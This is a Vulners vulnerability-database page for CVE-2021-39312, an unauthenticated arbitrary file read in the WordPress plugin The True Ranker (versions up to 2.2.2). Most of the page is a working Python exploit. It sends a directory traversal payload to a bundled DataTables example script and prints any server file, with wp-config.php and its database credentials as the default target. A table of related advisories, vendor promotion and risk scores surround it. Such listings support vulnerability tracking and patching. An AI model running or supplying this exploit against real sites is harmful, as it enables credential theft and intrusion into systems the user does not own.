Vulners
Lucene search
WordPress The True Ranker 2.2.2 Arbitrary File Read
🗓️ 05 Jan 2022 00:00:00Reported by Liad Levy, Nicole SheininType 
packetstorm🔗 packetstormsecurity.com👁 251 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | WordPress The True Ranker 2.2.2 Plugin - Arbitrary File Read (Unauthenticated) Exploit | 5 Jan 202200:00 | – | zdt |
 | CVE-2021-39312 | 14 Dec 202118:15 | – | circl |
 | WordPress 插件路径遍历漏洞 | 14 Dec 202100:00 | – | cnnvd |
 | WordPress Plugin Path Traversal Vulnerability (CNVD-2021-101672) | 19 Dec 202100:00 | – | cnvd |
 | CVE-2021-39312 | 14 Dec 202115:50 | – | cve |
 | CVE-2021-39312 True Ranker <= 2.2.2 Directory Traversal/Arbitrary File Read | 14 Dec 202115:50 | – | cvelist |
 | WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) | 5 Jan 202200:00 | – | exploitdb |
 | WordPress True Ranker <2.2.4 - Local File Inclusion | 3 Jun 202606:04 | – | nuclei |
 | CVE-2021-39312 | 14 Dec 202116:15 | – | nvd |
 | CVE-2021-39312 | 14 Dec 202116:15 | – | osv |
10
`# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
# Date: 23/12/2021
# Exploit Authors: Nicole Sheinin, Liad Levy
# Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/
# Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/
# Version: versions <= 2.2.2
# Tested on: MacOS
# CVE: CVE-2021-39312
# Github repo:
#!/usr/bin/env python3
import argparse, textwrap
import requests
import sys
parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter)
group_must = parser.add_argument_group('must arguments')
group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True)
parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False)
args = parser.parse_args()
if len(sys.argv) <= 2:
print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")
sys.exit()
HOST = args.url
PAYLOAD = args.payload
url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST)
payload = "/scripts/simple.php/{}".format(PAYLOAD)
r = requests.post(url,data={'src': payload})
if r.status_code == 200:
print(r.text)
else:
print("No exploit found")
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jan 2022 00:00Current
0.1Low risk
Vulners AI Score0.1
CVSS 25
CVSS 3.17.5
EPSS0.9078
SSVC